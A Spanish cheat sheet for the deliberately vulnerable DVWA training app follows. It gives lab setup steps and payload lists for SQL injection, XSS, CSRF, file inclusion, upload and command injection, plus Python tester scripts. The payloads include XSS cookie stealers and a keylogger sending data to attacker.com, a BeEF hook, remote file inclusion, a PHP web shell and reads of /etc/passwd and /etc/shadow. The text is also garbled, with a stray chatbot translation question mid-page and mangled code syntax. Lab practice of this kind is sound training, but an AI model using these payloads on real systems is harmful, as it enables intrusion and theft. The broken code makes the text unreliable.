Hoja de Referencia de DVWA (Damn Vulnerable Web Application)

📋 Copy All Commands 📄 Generate PDF

Descripción General

Damn Vulnerable Web Application (DVWA) es una aplicación web deliberadamente vulnerable diseñada para profesionales de seguridad, estudiantes y entusiastas para practicar pruebas de seguridad de aplicaciones web en un entorno legal y controlado. Desarrollada por Ryan Dewhurst y mantenida por el equipo de DVWA, esta aplicación web PHP/MySQL contiene numerosas vulnerabilidades intencionales que reflejan fallas de seguridad del mundo real comúnmente encontradas en aplicaciones web. DVWA sirve como una plataforma educativa que permite a los usuarios comprender cómo funcionan las vulnerabilidades de aplicaciones web, cómo pueden ser explotadas y, lo más importante, cómo pueden ser prevenidas.

La aplicación está estructurada en torno a las 10 principales vulnerabilidades de OWASP e incluye desafíos de seguridad adicionales que cubren un amplio espectro de problemas de seguridad de aplicaciones web. Cada vulnerabilidad en DVWA se implementa con múltiples niveles de dificultad - Bajo, Medio y Alto - permitiendo a los usuarios desarrollar progresivamente sus habilidades y comprensión. El nivel Bajo típicamente tiene controles de seguridad mínimos o nulos, el nivel Medio implementa algunas protecciones básicas que pueden ser eludidas, y el nivel Alto incluye medidas de seguridad más robustas que requieren técnicas avanzadas para ser explotadas.

El valor educativo de DVWA se extiende más allá de la simple explotación de vulnerabilidades. La aplicación incluye capacidades de visualización de código fuente, permitiendo a los usuarios examinar el código vulnerable y comprender las causas raíz de los problemas de seguridad. Esta característica es particularmente valiosa para desarrolladores que desean aprender prácticas de codificación segura al ver ejemplos de implementaciones vulnerables y seguras. La aplicación también proporciona pistas y orientación para cada vulnerabilidad, haciéndola accesible para principiantes mientras sigue siendo desafiante para profesionales experimentados.

La plataforma admite diversos enfoques de aprendizaje, desde el autoaprendizaje individual hasta la instrucción en el aula y programas de capacitación en seguridad. Su diseño modular permite a los instructores centrarse en tipos específicos de vulnerabilidades o crear ejercicios exhaustivos de evaluación de seguridad. DVWA se ha convertido en una herramienta estándar en la educación de ciberseguridad, utilizada por universidades, organizaciones de capacitación y profesionales de seguridad en todo el mundo para desarrollar habilidades prácticas de seguridad de aplicaciones web.

Would you like me to continue with the rest of the document? I can translate the remaining sections in the same manner.```bash

Pull DVWA Docker image

docker pull vulnerables/web-dvwa

Run DVWA container

docker run --rm -it -p 80:80 vulnerables/web-dvwa

Run with persistent data

docker run -d -p 80:80 --name dvwa vulnerables/web-dvwa

Access DVWA

Navigate to http://localhost in your browser

Default credentials: admin/password

Stop container

docker stop dvwa

Remove container

docker rm dvwa

Run with custom port

docker run -d -p 8080:80 --name dvwa vulnerables/web-dvwa

### Docker Compose Installation

```yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'

services:
  dvwa:
    image: vulnerables/web-dvwa
    container_name: dvwa
    ports:
      - "80:80"
    environment:
      - MYSQL_ROOT_PASSWORD=dvwa
      - MYSQL_DATABASE=dvwa
      - MYSQL_USER=dvwa
      - MYSQL_PASSWORD=p@ssw0rd
    volumes:
      - dvwa_data:/var/lib/mysql
    restart: unless-stopped

volumes:
  dvwa_data:
EOF

# Start DVWA
docker-compose up -d

# View logs
docker-compose logs -f

# Stop DVWA
docker-compose down

# Stop and remove volumes
docker-compose down -v

Manual Installation on Ubuntu/Debian

# Update system
sudo apt update && sudo apt upgrade -y

# Install LAMP stack
sudo apt install apache2 mysql-server php php-mysql php-gd libapache2-mod-php -y

# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql

# Secure MySQL installation
sudo mysql_secure_installation

# Create database and user
sudo mysql -u root -p ``<< 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF

# Download DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa

# Set permissions
sudo chown -R www-data:www-data /var/www/html/dvwa
sudo chmod -R 755 /var/www/html/dvwa

# Configure DVWA
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php

# Edit configuration
sudo nano /var/www/html/dvwa/config/config.inc.php
# Update database settings:
# $_DVWA['db_user'] = 'dvwa';
# $_DVWA['db_password'] = 'p@ssw0rd';
# $_DVWA['db_database'] = 'dvwa';

# Configure PHP
sudo nano /etc/php/*/apache2/php.ini
# Set: allow_url_include = On
# Set: allow_url_fopen = On

# Restart Apache
sudo systemctl restart apache2

# Access DVWA at http://localhost/dvwa

Installation on CentOS/RHEL

# Install EPEL repository
sudo yum install epel-release -y

# Install LAMP stack
sudo yum install httpd mariadb-server php php-mysql php-gd -y

# Start services
sudo systemctl start httpd
sudo systemctl start mariadb
sudo systemctl enable httpd
sudo systemctl enable mariadb

# Secure MariaDB
sudo mysql_secure_installation

# Create database
sudo mysql -u root -p << 'EOF'
CREATE DATABASE dvwa;
CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';
FLUSH PRIVILEGES;
EXIT;
EOF

# Download and configure DVWA
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git dvwa
sudo chown -R apache:apache /var/www/html/dvwa
sudo cp /var/www/html/dvwa/config/config.inc.php.dist /var/www/html/dvwa/config/config.inc.php

# Configure SELinux (if enabled)
sudo setsebool -P httpd_can_network_connect 1
sudo setsebool -P httpd_unified 1

# Configure firewall
sudo firewall-cmd --permanent --add-service=http
sudo firewall-cmd --reload

# Restart Apache
sudo systemctl restart httpd

Windows Installation (XAMPP)

# Download and install XAMPP
# https://www.apachefriends.org/download.html

# Start XAMPP Control Panel
# Start Apache and MySQL services

# Download DVWA
# Extract to C:\xampp\htdocs\dvwa

# Configure database
# Open phpMyAdmin (http://localhost/phpmyadmin)
# Create database 'dvwa'
# Create user 'dvwa' with password 'p@ssw0rd'

# Configure DVWA
# Copy config.inc.php.dist to config.inc.php
# Edit database settings in config.inc.php

# Access DVWA at http://localhost/dvwa

Initial Setup and Configuration

First-Time Setup

# Access DVWA setup page
# Navigate to http://localhost/dvwa/setup.php

# Check system requirements
# Ensure all requirements are met (green checkmarks)

# Create/Reset Database
# Click "Create / Reset Database" button

# Login to DVWA
# Navigate to http://localhost/dvwa/login.php
# Username: admin
# Password: password

# Change default password (recommended)
# Go to DVWA Security ->`` Change Password

Security Level Configuration

# Set security level
# Navigate to DVWA Security

# Low Security Level
# - Minimal security controls
# - Basic vulnerabilities easily exploitable
# - Ideal for beginners

# Medium Security Level
# - Some security controls implemented
# - Requires intermediate techniques
# - Good for skill development

# High Security Level
# - Robust security measures
# - Advanced exploitation techniques required
# - Challenging for experienced users

# Impossible Security Level
# - Secure implementation
# - Shows how vulnerabilities should be fixed
# - Educational reference for developers

User Management

# Default users in DVWA:
# admin:password (Administrator)
# gordonb:abc123 (User)
# 1337:charley (User)
# pablo:letmein (User)
# smithy:password (User)

# Add new users (via database)
mysql -u dvwa -p dvwa << 'EOF'
INSERT INTO users (user_id, first_name, last_name, user, password, avatar, last_login, failed_login)
VALUES (6, 'Test', 'User', 'testuser', '5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8', 'http://localhost/dvwa/hackable/users/testuser.jpg', '0000-00-00 00:00:00', 0);
EOF

# Password hash for 'password': 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8

Vulnerability Modules

SQL Injection

# Low Security Level
# Basic SQL injection
' OR '1'='1
' OR 1=1 --
' OR 1=1 #

# Extract database information
' UNION SELECT null, version() #
' UNION SELECT null, database() #
' UNION SELECT null, user() #

# Extract table names
' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() #

# Extract column names
' UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users' #

# Extract user data
' UNION SELECT user, password FROM users #

# Medium Security Level
# Bypass basic filtering
1' OR '1'='1
1' OR 1=1 --
1' UNION SELECT null, version() --

# High Security Level
# Use advanced techniques
1' OR '1'='1' LIMIT 1 --
1' UNION SELECT null, CONCAT(user,':',password) FROM users LIMIT 1 --

SQL Injection (Blind)

# Boolean-based blind SQL injection
# Low Security Level
1' AND 1=1 #  (True condition)
1' AND 1=2 #  (False condition)

# Extract database name length
1' AND LENGTH(database())=4 #

# Extract database name character by character
1' AND SUBSTRING(database(),1,1)='d' #
1' AND SUBSTRING(database(),2,1)='v' #
1' AND SUBSTRING(database(),3,1)='w' #
1' AND SUBSTRING(database(),4,1)='a' #

# Time-based blind SQL injection
1' AND SLEEP(5) #
1' AND IF(LENGTH(database())=4,SLEEP(5),0) #

# Extract user count
1' AND (SELECT COUNT(*) FROM users)=5 #

# Extract admin password length
1' AND LENGTH((SELECT password FROM users WHERE user='admin'))=32 #

Cross-Site Scripting (XSS)

# Reflected XSS
# Low Security Level
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

# Medium Security Level
# Bypass basic filtering
<Script>alert('XSS')</Script>
<SCRIPT>alert('XSS')</SCRIPT>
<img src=x onerror="alert('XSS')">
<svg/onload=alert('XSS')>

# High Security Level
# Advanced bypass techniques
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg><script>alert('XSS')</script></svg>

# Cookie stealing payload
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

# Keylogger payload
<script>
document.onkeypress = function(e) \\\\{
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://attacker.com/log.php?key=' + String.fromCharCode(e.which), true);
    xhr.send();
\\\\}
</script>

Cross-Site Scripting (Stored)

# Stored XSS in message/comment fields
# Low Security Level
<script>alert('Stored XSS')</script>
<img src=x onerror=alert('Stored XSS')>

# Persistent cookie stealing
<script>
var img = new Image();
img.src = 'http://attacker.com/steal.php?cookie=' + document.cookie;
</script>

# Admin session hijacking
<script>
if(document.cookie.indexOf('admin') !== -1) \\\\{
    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'http://attacker.com/admin.php?session=' + document.cookie, true);
    xhr.send();
\\\\}
</script>

# BeEF hook
<script src="http://attacker.com:3000/hook.js"></script>

# Medium/High Security Level
# Use encoding and obfuscation
<img src=x onerror="eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))">

Cross-Site Request Forgery (CSRF)

<form action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
    <input type="hidden" name="password_new" value="hacked123">
    <input type="hidden" name="password_conf" value="hacked123">
    <input type="hidden" name="Change" value="Change">
    <input type="submit" value="Click me!">
</form>

<form id="csrf" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
    <input type="hidden" name="password_new" value="hacked123">
    <input type="hidden" name="password_conf" value="hacked123">
    <input type="hidden" name="Change" value="Change">
</form>
<script>document.getElementById('csrf').submit();</script>

<img src="http://localhost/dvwa/vulnerabilities/csrf/?password_new=hacked123&password_conf=hacked123&Change=Change">

<iframe src="data:text/html,<form action='http://localhost/dvwa/vulnerabilities/csrf/' method='GET'><input name='password_new' value='hacked123'><input name='password_conf' value='hacked123'><input name='Change' value='Change'></form><script>document.forms[0].submit()</script>"></iframe>

File Inclusion

# Local File Inclusion (LFI)
# Low Security Level
page=../../../etc/passwd
page=../../../etc/shadow
page=../../../var/log/apache2/access.log
page=../../../proc/version
page=../../../home/user/.bash_history

# Windows LFI
page=../../../windows/system32/drivers/etc/hosts
page=../../../windows/win.ini
page=../../../windows/system.ini

# PHP wrapper exploitation
page=php://filter/convert.base64-encode/resource=../../../etc/passwd
page=php://filter/read=string.rot13/resource=../../../etc/passwd

# Log poisoning
# First, poison the log file via User-Agent
# Then include the log file
page=../../../var/log/apache2/access.log

# Medium Security Level
# Bypass basic filtering
page=....//....//....//etc/passwd
page=..././..././..././etc/passwd

# High Security Level
# Use null byte injection (older PHP versions)
page=../../../etc/passwd%00
page=../../../etc/passwd%00.php

# Remote File Inclusion (RFI)
# If allow_url_include is enabled
page=http://attacker.com/shell.txt
page=ftp://attacker.com/shell.txt

File Upload

# Low Security Level
# Upload PHP shell directly
<?php system($_GET['cmd']); ?>

# Save as shell.php and upload

# Medium Security Level
# Bypass MIME type filtering
# Change Content-Type to image/jpeg
# Or use double extension: shell.php.jpg

# Bypass file extension filtering
shell.php
shell.php5
shell.phtml
shell.phar

# High Security Level
# Embed PHP in image
# Create valid image with embedded PHP
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename to image.php

# GIF header bypass
GIF89a
<?php system($_GET['cmd']); ?>

# PNG bypass with PHP
# Create PNG with PHP payload in metadata

Command Injection

# Low Security Level
# Basic command injection
127.0.0.1; ls
127.0.0.1 && whoami
127.0.0.1|cat /etc/passwd
127.0.0.1 & id

# Windows command injection
127.0.0.1 & dir
127.0.0.1 && type C:\windows\win.ini
127.0.0.1|net user

# Medium Security Level
# Bypass basic filtering
127.0.0.1;ls
127.0.0.1&&whoami
127.0.0.1|cat$\\\\{IFS\\\\}/etc/passwd

# High Security Level
# Advanced bypass techniques
127.0.0.1|cat</etc/passwd
127.0.0.1|cat<>/etc/passwd
127.0.0.1|\\\\{cat,/etc/passwd\\\\}

Weak Session IDs

# Analyze session ID patterns
# Low Security Level
# Session IDs increment sequentially
# Predict next session ID

# Medium Security Level
# Session IDs based on timestamp
# Calculate based on time

# High Security Level
# Session IDs use MD5 of timestamp
# Still predictable with time knowledge

# Session hijacking techniques
# Capture session cookies
# Use browser developer tools
# Intercept with Burp Suite
# Session fixation attacks

Insecure CAPTCHA

# Low Security Level
# CAPTCHA validation bypass
# Remove step parameter
# Modify passed parameter

# Medium Security Level
# Bypass CAPTCHA validation
# Reuse passed parameter
# Manipulate form data

# High Security Level
# Advanced CAPTCHA bypass
# Analyze CAPTCHA generation
# Exploit implementation flaws

# Automated bypass techniques
# Use OCR tools
# Machine learning approaches
# Pattern recognition

Testing Methodologies

Manual Testing Approach

```bash

1. Reconnaissance

- Examine source code

- Identify input fields

- Analyze client-side validation

- Check for hidden parameters

2. Input Validation Testing

- Test all input fields

- Try various payloads

- Check for filtering mechanisms

- Test boundary conditions

3. Authentication Testing

- Test login mechanisms

- Check session management

- Test password policies

- Verify logout functionality

4. Authorization Testing

- Test access controls

- Check privilege escalation

- Verify user roles

- Test direct object references

5. Session Management Testing

- Analyze session tokens

- Test session fixation

- Check session timeout

- Verify secure flags

### Herramientas de Pruebas Automatizadasbash

SQLmap for SQL injection

sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=your_session_id; security=low" --dbs

Nikto web scanner

nikto -h http://localhost/dvwa/

OWASP ZAP

Configure proxy settings

Spider the application

Run active scan

Burp Suite

Configure browser proxy

Intercept requests

Use scanner and intruder

w3af web application scanner

w3af_console target http://localhost/dvwa/ plugins audit sql_injection,xss,csrf crawl web_spider start ### Scripts de Pruebas Personalizadospython

!/usr/bin/env python3

DVWA SQL injection tester

import requests import sys

def test_sql_injection(base_url, session_cookie): payloads = [ "' OR '1'='1", "' OR 1=1 --", "' OR 1=1 #", "' UNION SELECT null, version() #", "' UNION SELECT user, password FROM users #" ]

headers = \\\\{
    'Cookie': f'PHPSESSID=\\\\{session_cookie\\\\}; security=low'
\\\\}

for payload in payloads:
    url = f"\\\\{base_url\\\\}/vulnerabilities/sqli/?id=\\\\{payload\\\\}&Submit=Submit"

    try:
        response = requests.get(url, headers=headers)
        if 'admin' in response.text or 'root' in response.text:
            print(f"[+] Successful payload: \\\\{payload\\\\}")
            print(f"[+] Response contains sensitive data")
        else:
            print(f"[-] Failed payload: \\\\{payload\\\\}")
    except Exception as e:
        print(f"[!] Error with payload \\\\{payload\\\\}: \\\\{e\\\\}")

if name == "main": if len(sys.argv) != 3: print("Usage: python3 dvwa_sqli_test.py ") sys.exit(1)

base_url = sys.argv[1]
session_cookie = sys.argv[2]
test_sql_injection(base_url, session_cookie)

```## Ejercicios Educativos

Ejercicios para Principiantes

```bash

Exercise 1: Basic SQL Injection

Objective: Extract all usernames and passwords

Steps:

1. Set security level to Low

2. Navigate to SQL Injection module

3. Try basic payloads

4. Extract database information

5. Dump user credentials

Exercise 2: Reflected XSS

Objective: Execute JavaScript in victim's browser

Steps:

1. Find XSS vulnerable parameter

2. Craft XSS payload

3. Test different bypass techniques

4. Create cookie stealing payload

Exercise 3: File Upload Bypass

Objective: Upload and execute PHP shell

Steps:

1. Create PHP shell

2. Try direct upload

3. Bypass file type restrictions

4. Execute commands through shell

### Ejercicios Intermediosbash

Exercise 4: Blind SQL Injection

Objective: Extract data without direct output

Steps:

1. Identify blind injection point

2. Use boolean-based techniques

3. Extract database name

4. Extract user passwords

5. Automate extraction process

Exercise 5: CSRF Attack Chain

Objective: Change admin password via CSRF

Steps:

1. Analyze password change functionality

2. Create CSRF proof of concept

3. Test different delivery methods

4. Bypass CSRF protections

Exercise 6: LFI to RCE

Objective: Achieve code execution via LFI

Steps:

1. Find LFI vulnerability

2. Test file inclusion

3. Poison log files

4. Achieve remote code execution

### Ejercicios Avanzadosbash

Exercise 7: Multi-Stage Attack

Objective: Combine multiple vulnerabilities

Steps:

1. Use XSS to steal admin session

2. Use CSRF to change admin password

3. Login as admin

4. Upload shell via file upload

5. Achieve system access

Exercise 8: Session Prediction

Objective: Predict and hijack sessions

Steps:

1. Analyze session ID generation

2. Identify patterns

3. Predict valid session IDs

4. Hijack user sessions

Exercise 9: Complete Compromise

Objective: Full application takeover

Steps:

1. Enumerate all vulnerabilities

2. Chain exploits together

3. Escalate privileges

4. Maintain persistence

5. Document attack path

```## Integración con Herramientas de Seguridad

Integración con Burp Suite

```bash

Configure Burp Suite proxy

Browser settings: 127.0.0.1:8080

Burp Suite testing workflow

1. Spider DVWA application

2. Review site map

3. Send requests to Repeater

4. Test with Intruder

5. Run active scanner

Custom Burp extensions for DVWA

- DVWA Security Level Changer

- Automated payload generator

- Custom session handling

### Integración con OWASP ZAPbash

ZAP automated scan

zap-baseline.py -t http://localhost/dvwa/

ZAP full scan

zap-full-scan.py -t http://localhost/dvwa/

ZAP API usage

Start ZAP daemon

zap.sh -daemon -port 8080

Spider application

curl "http://localhost:8080/JSON/spider/action/scan/?url=http://localhost/dvwa/"

Active scan

curl "http://localhost:8080/JSON/ascan/action/scan/?url=http://localhost/dvwa/"

Generate report

curl "http://localhost:8080/OTHER/core/other/htmlreport/" > dvwa_report.html ### Escáner de Seguridad Personalizadopython

!/usr/bin/env python3

DVWA comprehensive scanner

import requests import re import time from urllib.parse import urljoin

class DVWAScanner: def init(self, base_url, session_cookie): self.base_url = base_url self.session = requests.Session() self.session.cookies.set('PHPSESSID', session_cookie) self.session.cookies.set('security', 'low')

def test_sql_injection(self):
    print("[*] Testing SQL Injection...")
    url = urljoin(self.base_url, '/vulnerabilities/sqli/')

    payloads = [
        "' OR '1'='1",
        "' UNION SELECT user, password FROM users #"
    ]

    for payload in payloads:
        params = \\\\{'id': payload, 'Submit': 'Submit'\\\\}
        response = self.session.get(url, params=params)

        if 'admin' in response.text:
            print(f"[+] SQL Injection successful: \\\\{payload\\\\}")
            return True

    print("[-] SQL Injection not found")
    return False

def test_xss(self):
    print("[*] Testing XSS...")
    url = urljoin(self.base_url, '/vulnerabilities/xss_r/')

    payloads = [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>"
    ]

    for payload in payloads:
        params = \\\\{'name': payload\\\\}
        response = self.session.get(url, params=params)

        if payload in response.text:
            print(f"[+] XSS successful: \\\\{payload\\\\}")
            return True

    print("[-] XSS not found")
    return False

def test_file_inclusion(self):
    print("[*] Testing File Inclusion...")
    url = urljoin(self.base_url, '/vulnerabilities/fi/')

    payloads = [
        "../../../etc/passwd",
        "php://filter/convert.base64-encode/resource=../../../etc/passwd"
    ]

    for payload in payloads:
        params = \\\\{'page': payload\\\\}
        response = self.session.get(url, params=params)

        if 'root:' in response.text or 'cm9vdDo' in response.text:
            print(f"[+] File Inclusion successful: \\\\{payload\\\\}")
            return True

    print("[-] File Inclusion not found")
    return False

def run_scan(self):
    print(f"[*] Starting DVWA scan on \\\\{self.base_url\\\\}")

    results = \\\\{
        'sql_injection': self.test_sql_injection(),
        'xss': self.test_xss(),
        'file_inclusion': self.test_file_inclusion()
    \\\\}

    print("\n[*] Scan Results:")
    for vuln, found in results.items():
        status = "VULNERABLE" if found else "NOT FOUND"
        print(f"  \\\\{vuln\\\\}: \\\\{status\\\\}")

    return results

if name == "main": scanner = DVWAScanner("http://localhost/dvwa", "your_session_id") scanner.run_scan() ```## Mejores Prácticas para Aprender

Ruta de Aprendizaje Progresivo

```bash

Phase 1: Understanding Basics (Low Security)

- Learn how vulnerabilities work

- Practice basic exploitation

- Understand attack vectors

- Review source code

Phase 2: Bypass Techniques (Medium Security)

- Learn common protections

- Practice bypass methods

- Understand filtering mechanisms

- Develop advanced payloads

Phase 3: Advanced Exploitation (High Security)

- Master complex techniques

- Chain multiple vulnerabilities

- Develop custom exploits

- Understand defense mechanisms

Phase 4: Secure Development (Impossible Security)

- Study secure implementations

- Learn defensive coding

- Understand security controls

- Apply lessons to real applications

### Documentación e Informesbash

Create learning journal

mkdir ~/dvwa_learning cd ~/dvwa_learning

Document each vulnerability

cat << 'EOF' > sql_injection_notes.md

SQL Injection Learning Notes

Low Security Level

• Vulnerability: Direct SQL injection in id parameter
• Payload: ' OR '1'='1
• Result: Bypassed authentication
• Root Cause: No input validation

Medium Security Level

• Protection: Basic filtering of quotes
• Bypass: Using numeric injection
• Payload: 1 OR 1=1
• Lesson: Client-side filtering insufficient

High Security Level

• Protection: Prepared statements
• Result: Injection prevented
• Lesson: Proper parameterization prevents SQLi EOF

Create exploit database

cat << 'EOF' > exploits.txt

DVWA Exploit Database

SQL Injection

' OR '1'='1 ' UNION SELECT user, password FROM users #

XSS

File Inclusion

../../../etc/passwd php://filter/convert.base64-encode/resource=../../../etc/passwd EOF ### Entorno de Pruebas Segurobash

Isolated network setup

Use VirtualBox/VMware

Create isolated network segment

No internet access for vulnerable systems

Backup and restore

Create VM snapshots before testing

Document system state

Reset between exercises

Monitoring and logging

Enable web server logs

Monitor system activity

Document all actions

Review logs for learning

```---

⚠️ Aviso de Seguridad: DVWA (Damn Vulnerable Web Application) es intencionalmente vulnerable y solo debe usarse en entornos aislados y controlados con fines educativos. Nunca implementes DVWA en redes de producción o sistemas accesibles desde internet. La aplicación contiene vulnerabilidades de seguridad graves que podrían comprometer la seguridad del sistema si se expone. Siempre usa DVWA en máquinas virtuales o entornos de laboratorio aislados. Esta herramienta está diseñada para aprender seguridad de aplicaciones web y debe ser utilizada responsablemente por profesionales de seguridad, estudiantes e investigadores.

📚 Recursos Adicionales: - Repositorio Oficial de GitHub de DVWA - Documentación de DVWA - OWASP Top 10 - Guía de Pruebas de Seguridad de Aplicaciones Web